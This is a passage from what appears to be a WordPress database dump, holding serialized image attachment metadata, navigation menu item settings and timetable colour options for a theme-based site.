th\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2414,4348,'_wp_attached_file','2018/02/h5-tabs-img-1-1.png'),(2415,4348,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:459;s:6:\"height\";i:306;s:4:\"file\";s:27:\"2018/02/h5-tabs-img-1-1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"h5-tabs-img-1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"h5-tabs-img-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"h5-tabs-img-1-1-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"h5-tabs-img-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"h5-tabs-img-1-1-459x300.png\";s:5:\"width\";i:459;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"h5-tabs-img-1-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"h5-tabs-img-1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"h5-tabs-img-1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2416,2935,'_wp_attachment_image_alt','o'),(2417,4348,'_wp_attachment_image_alt','o'),(2418,2942,'_wp_attached_file','2018/02/h10-slide3-graphic2.jpg'),(2419,2942,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:648;s:6:\"height\";i:389;s:4:\"file\";s:31:\"2018/02/h10-slide3-graphic2.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h10-slide3-graphic2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-550x389.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-550x389.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h10-slide3-graphic2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h10-slide3-graphic2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2420,4349,'_wp_attached_file','2018/02/h10-slide3-graphic2-1.jpg'),(2421,4349,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:648;s:6:\"height\";i:389;s:4:\"file\";s:33:\"2018/02/h10-slide3-graphic2-1.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-550x389.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-550x389.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:389;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-600x360.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"h10-slide3-graphic2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2422,2942,'_wp_attachment_image_alt','o'),(2423,4349,'_wp_attachment_image_alt','o'),(2424,2964,'_wp_attached_file','2018/02/about-us-img-1.jpg'),(2425,2964,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:564;s:4:\"file\";s:26:\"2018/02/about-us-img-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"about-us-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"about-us-img-1-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"about-us-img-1-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:27:\"about-us-img-1-1536x451.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"about-us-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-550x564.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:27:\"about-us-img-1-1100x564.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"about-us-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2426,4350,'_wp_attached_file','2018/02/about-us-img-1-1.jpg'),(2427,4350,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:564;s:4:\"file\";s:28:\"2018/02/about-us-img-1-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"about-us-img-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"about-us-img-1-1-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"about-us-img-1-1-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"about-us-img-1-1-1536x451.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"about-us-img-1-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-550x564.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:29:\"about-us-img-1-1-1100x564.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:564;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"about-us-img-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-600x176.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:176;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"about-us-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2428,4350,'_wp_attachment_image_alt','k'),(2429,2964,'_wp_attachment_image_alt','k'),(2430,4351,'_menu_item_type','custom'),(2431,4351,'_menu_item_menu_item_parent','0'),(2432,4351,'_menu_item_object_id','4351'),(2433,4351,'_menu_item_object','custom'),(2434,4351,'_menu_item_target',''),(2435,4351,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2436,4351,'_menu_item_xfn',''),(2437,4351,'_menu_item_url','#'),(2438,4352,'_menu_item_type','custom'),(2439,4352,'_menu_item_menu_item_parent','0'),(2440,4352,'_menu_item_object_id','4352'),(2441,4352,'_menu_item_object','custom'),(2442,4352,'_menu_item_target',''),(2443,4352,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2444,4352,'_menu_item_xfn',''),(2445,4352,'_menu_item_url','#'),(2446,4353,'_menu_item_type','custom'),(2447,4353,'_menu_item_menu_item_parent','0'),(2448,4353,'_menu_item_object_id','4353'),(2449,4353,'_menu_item_object','custom'),(2450,4353,'_menu_item_target',''),(2451,4353,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2452,4353,'_menu_item_xfn',''),(2453,4353,'_menu_item_url','#'),(2454,4354,'_menu_item_type','custom'),(2455,4354,'_menu_item_menu_item_parent','0'),(2456,4354,'_menu_item_object_id','4354'),(2457,4354,'_menu_item_object','custom'),(2458,4354,'_menu_item_target',''),(2459,4354,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2460,4354,'_menu_item_xfn',''),(2461,4354,'_menu_item_url','#'),(2462,4355,'_menu_item_type','custom'),(2463,4355,'_menu_item_menu_item_parent','0'),(2464,4355,'_menu_item_object_id','4355'),(2465,4355,'_menu_item_object','custom'),(2466,4355,'_menu_item_target',''),(2467,4355,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2468,4355,'_menu_item_xfn',''),(2469,4355,'_menu_item_url','#'),(2470,4356,'_menu_item_type','custom'),(2471,4356,'_menu_item_menu_item_parent','0'),(2472,4356,'_menu_item_object_id','4356'),(2473,4356,'_menu_item_object','custom'),(2474,4356,'_menu_item_target',''),(2475,4356,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2476,4356,'_menu_item_xfn',''),(2477,4356,'_menu_item_url','#'),(2478,4357,'_menu_item_type','custom'),(2479,4357,'_menu_item_menu_item_parent','0'),(2480,4357,'_menu_item_object_id','4357'),(2481,4357,'_menu_item_object','custom'),(2482,4357,'_menu_item_target',''),(2483,4357,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2484,4357,'_menu_item_xfn',''),(2485,4357,'_menu_item_url','http://tummyrevolution.com/'),(2494,4359,'_menu_item_type','custom'),(2495,4359,'_menu_item_menu_item_parent','0'),(2496,4359,'_menu_item_object_id','4359'),(2497,4359,'_menu_item_object','custom'),(2498,4359,'_menu_item_target',''),(2499,4359,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2500,4359,'_menu_item_xfn',''),(2501,4359,'_menu_item_url','http://tummyrevolution.com/'),(2502,4360,'_menu_item_type','custom'),(2503,4360,'_menu_item_menu_item_parent','0'),(2504,4360,'_menu_item_object_id','4360'),(2505,4360,'_menu_item_object','custom'),(2506,4360,'_menu_item_target',''),(2507,4360,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2508,4360,'_menu_item_xfn',''),(2509,4360,'_menu_item_url','#'),(2510,1610,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2511,1610,'slide_template','default'),(2512,1610,'timetable_subtitle',''),(2513,1610,'timetable_color','ffffff'),(2514,1610,'timetable_hover_color',''),(2515,1610,'timetable_text_color','4fbf70'),(2516,1610,'timetable_hover_text_color',''),(2517,1610,'timetable_hours_text_color','808080'),(2518,1610,'timetable_hours_hover_text_color',''),(2519,1610,'timetable_custom_url',''),(2520,1610,'timetable_disable_url','1'),(2521,1610,'_wp_old_slug','body-balance'),(2522,1610,'_wpb_vc_js_status','false'),(2523,1644,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2524,1644,'slide_template','default'),(2525,1644,'timetable_subtitle',''),(2526,1644,'timetable_color','ffffff'),(2527,1644,'timetable_hover_color',''),(2528,1644,'timetable_text_color','ffbea5'),(2529,1644,'timetable_hover_text_color',''),(2530,1644,'timetable_hours_text_color',''),(2531,1644,'timetable_hours_hover_text_color',''),(2532,1644,'timetable_custom_url',''),(2533,1644,'timetable_disable_url','1'),(2534,1644,'_wpb_vc_js_status','false'),(2535,1651,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2536,1651,'slide_template','default'),(2537,1651,'timetable_subtitle',''),(2538,1651,'timetable_color','ffffff'),(2539,1651,'timetable_hover_color',''),(2540,1651,'timetable_text_color','54c8cf'),(2541,1651,'timetable_hover_text_color',''),(2542,1651,'timetable_hours_text_color','808080'),(2543,1651,'timetable_hours_hover_text_color',''),(2544,1651,'timetable_custom_url',''),(2545,1651,'timetable_disable_url','1'),(2546,1651,'_wpb_vc_js_status','false'),(2555,4362,'_menu_item_type','custom'),(2556,4362,'_menu_item_menu_item_parent','4352'),(2557,4362,'_menu_item_object_id','4362'),(2558,4362,'_menu_item_object','custom'),(2559,4362,'_menu_item_target',''),(2560,4362,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2561,4362,'_menu_item_xfn',''),(2562,4362,'_menu_item_url','http://succulents.select-themes.com/404-error-page'),(2563,4363,'_menu_item_type','custom'),(2564,4363,'_menu_item_menu_item_parent','0'),(2565,4363,'_menu_item_object_id','4363'),(2566,4363,'_menu_item_object','custom'),(2567,4363,'_menu_item_target',''),(2568,4363,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2569,4363,'_menu_item_xfn',''),(2570,4363,'_menu_item_url','#'),(2571,4364,'_menu_item_type','custom'),(2572,4364,'_menu_item_menu_item_parent','0'),(2573,4364,'_menu_item_object_id','4364'),(2574,4364,'_menu_item_object','custom'),(2575,4364,'_menu_item_target',''),(2576,4364,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2577,4364,'_menu_item_xfn',''),(2578,4364,'_menu_item_url','#'),(2579,4365,'_menu_item_type','custom'),(2580,4365,'_menu_item_menu_item_parent','0'),(2581,4365,'_menu_item_object_id','4365'),(2582,4365,'_menu_item_object','custom'),(2583,4365,'_menu_item_target',''),(2584,4365,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2585,4365,'_menu_item_xfn',''),(2586,4365,'_menu_item_url','#'),(2587,4366,'_menu_item_type','custom'),(2588,4366,'_menu_item_menu_item_parent','0'),(2589,4366,'_menu_item_object_id','4366'),(2590,4366,'_menu_item_object','custom'),(2591,4366,'_menu_item_target',''),(2592,4366,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2593,4366,'_menu_item_xfn',''),(2594,4366,'_menu_item_url','#'),(2595,4367,'_menu_item_type','custom'),(2596,4367,'_menu_item_menu_item_parent','4354'),(2597,4367,'_menu_item_object_id','4367'),(2598,4367,'_menu_item_object','custom'),(2599,4367,'_menu_item_target',''),(2600,4367,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2601,4367,'_menu_item_xfn',''),(2602,4367,'_menu_item_url','#'),(2603,4368,'_menu_item_type','custom'),(2604,4368,'_menu_item_menu_item_parent','4355'),(2605,4368,'_menu_item_object_id','4368'),(2606,4368,'_menu_item_object','custom'),(2607,4368,'_menu_item_target',''),(2608,4368,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2609,4368,'_menu_item_xfn',''),(2610,4368,'_menu_item_url','#'),(2611,4369,'_menu_item_type','custom'),(2612,4369,'_menu_item_menu_item_parent','4355'),(2613,4369,'_menu_item_object_id','4369'),(2614,4369,'_menu_item_object','custom'),(2615,4369,'_menu_item_target',''),(2616,4369,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2617,4369,'_menu_item_xfn',''),(2618,4369,'_menu_item_url','#'),(2619,4370,'_menu_item_type','custom'),(2620,4370,'_menu_item_menu_item_parent','4353'),(2621,4370,'_menu_item_object_id','4370'),(2622,4370,'_menu_item_object','custom'),(2623,4370,'_menu_item_target',''),(2624,4370,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2625,4370,'_menu_item_xfn',''),(2626,4370,'_menu_item_url','#'),(2627,4371,'_menu_item_type','custom'),(2628,4371,'_menu_item_menu_item_parent','4353'),(2629,4371,'_menu_item_object_id','4371'),(2630,4371,'_menu_item_object','custom'),(2631,4371,'_menu_item_target',''),(2632,4371,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2633,4371,'_menu_item_xfn',''),(2634,4371,'_menu_item_url','#'),(2635,4372,'_menu_item_type','custom'),(2636,4372,'_menu_item_menu_item_parent','4353'),(2637,4372,'_menu_item_object_id','4372'),(2638,4372,'_menu_item_object','custom'),(2639,4372,'_menu_item_target',''),(2640,4372,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2641,4372,'_menu_item_xfn',''),(2642,4372,'_menu_item_url','#'),(2667,4376,'_menu_item_type','custom'),(2668,4376,'_menu_item_menu_item_parent','0'),(2669,4376,'_menu_item_object_id','4376'),(2670,4376,'_menu_item_object','custom'),(2671,4376,'_menu_item_target',''),(2672,4376,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2673,4376,'_menu_item_xfn',''),(2674,4376,'_menu_item_url','#'),(2675,4377,'_menu_item_type','custom'),(2676,4377,'_menu_item_menu_item_parent','0'),(2677,4377,'_menu_item_object_id','4377'),(2678,4377,'_menu_item_object','custom'),(2679,4377,'_menu_item_target',''),(2680,4377,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2681,4377,'_menu_item_xfn',''),(2682,4377,'_menu_item_url','#'),(2683,4378,'_menu_item_type','custom'),(2684,4378,'_menu_item_menu_item_parent','0'),(2685,4378,'_menu_item_object_id','4378'),(2686,4378,'_menu_item_object','custom'),(2687,4378,'_menu_item_target',''),(2688,4378,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2689,4378,'_menu_item_xfn',''),(2690,4378,'_menu_item_url','#'),(2691,4379,'_menu_item_type','custom'),(2692,4379,'_menu_item_menu_item_parent','0'),(2693,4379,'_menu_item_object_id','4379'),(2694,4379,'_menu_item_object','custom'),(2695,4379,'_menu_item_target',''),(2696,4379,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2697,4379,'_menu_item_xfn',''),(2698,4379,'_menu_item_url','#'),(2699,4380,'_menu_item_type','custom'),(2700,4380,'_menu_item_menu_item_parent','0'),(2701,4380,'_menu_item_object_id','4380'),(2702,4380,'_menu_item_object','custom'),(2703,4380,'_menu_item_target',''),(2704,4380,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2705,4380,'_menu_item_xfn',''),(2706,4380,'_menu_item_url','#'),(2707,4381,'_menu_item_type','custom'),(2708,4381,'_menu_item_menu_item_parent','4356'),(2709,4381